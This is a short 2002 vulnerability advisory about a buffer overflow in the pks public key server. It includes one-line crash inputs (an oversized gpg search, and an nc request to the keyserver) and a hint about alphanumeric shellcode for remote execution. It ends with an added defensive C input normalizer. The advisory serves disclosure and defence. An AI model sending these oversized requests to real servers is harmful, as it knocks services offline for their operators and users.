pks buffer overflow
30th May 2002 [SBWID-5378]

	pks buffer overflow


	current version


	Max [] posted following:

	A popular pks public key server available from is vulnerable to buffer
	overflow attack.

	A long enough (> 256b) search request will crash the service.

	It is as simple as this:


	gpg --search-keys `perl -e "print 'A'x512"`



	or, without gpg,


	echo -e "GET /pks/lookup?op=index&search=`perl -e "print 'A'x512"`"| nc keyserver-host 11371



	Fortunately (or unfortunately) in order to exploit remote execution,
	the code should be isalnum() string and should be able to survive
	tolower() conversion. But it is possible to write, especially for
	systems with locales, where 0x80..0xff are printable characters.


	Nothing yet.
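
A defensive counterpart to the crash described above, added here as an illustration and not taken from the pks source: a bounded, locale-independent normalizer for the search term. The function name, return codes and the 256-byte buffer size are assumptions, and rejecting every non-alphanumeric byte is a simplification.

```c
#include <stdio.h>
#include <string.h>

#define SEARCH_MAX 256  /* assumed size, taken from the "> 256b" figure above */
enum { NORM_OK = 0, NORM_TOO_LONG = -1, NORM_BAD_BYTE = -2 };

/* ASCII-only stand-ins for isalnum()/tolower(). The <ctype.h> versions follow
 * the current locale, so under some locales bytes 0x80..0xff pass isalnum(). */
static int ascii_isalnum(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
           (c >= 'a' && c <= 'z');
}

static char ascii_tolower(unsigned char c)
{
    return (char)((c >= 'A' && c <= 'Z') ? c + ('a' - 'A') : c);
}

/* Lower-case `in` into out[outsz]. Oversized or non-alphanumeric input is
 * rejected (never truncated) and `out` is left as an empty string. */
int normalize_search(const char *in, size_t inlen, char *out, size_t outsz)
{
    size_t i;
    if (outsz == 0)
        return NORM_TOO_LONG;
    out[0] = '\0';
    if (inlen >= outsz)          /* checked before any byte is copied */
        return NORM_TOO_LONG;
    for (i = 0; i < inlen; i++) {
        unsigned char c = (unsigned char)in[i];
        if (!ascii_isalnum(c)) {
            out[0] = '\0';
            return NORM_BAD_BYTE;
        }
        out[i] = ascii_tolower(c);
    }
    out[inlen] = '\0';
    return NORM_OK;
}

int main(void)
{
    char term[SEARCH_MAX], big[512];   /* big: constructed 512-byte request */
    memset(big, 'A', sizeof big);
    printf("512 bytes -> %d\n", normalize_search(big, sizeof big, term, sizeof term));
    printf("AbC123    -> %d\n", normalize_search("AbC123", 6, term, sizeof term));
    return 0;
}
```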
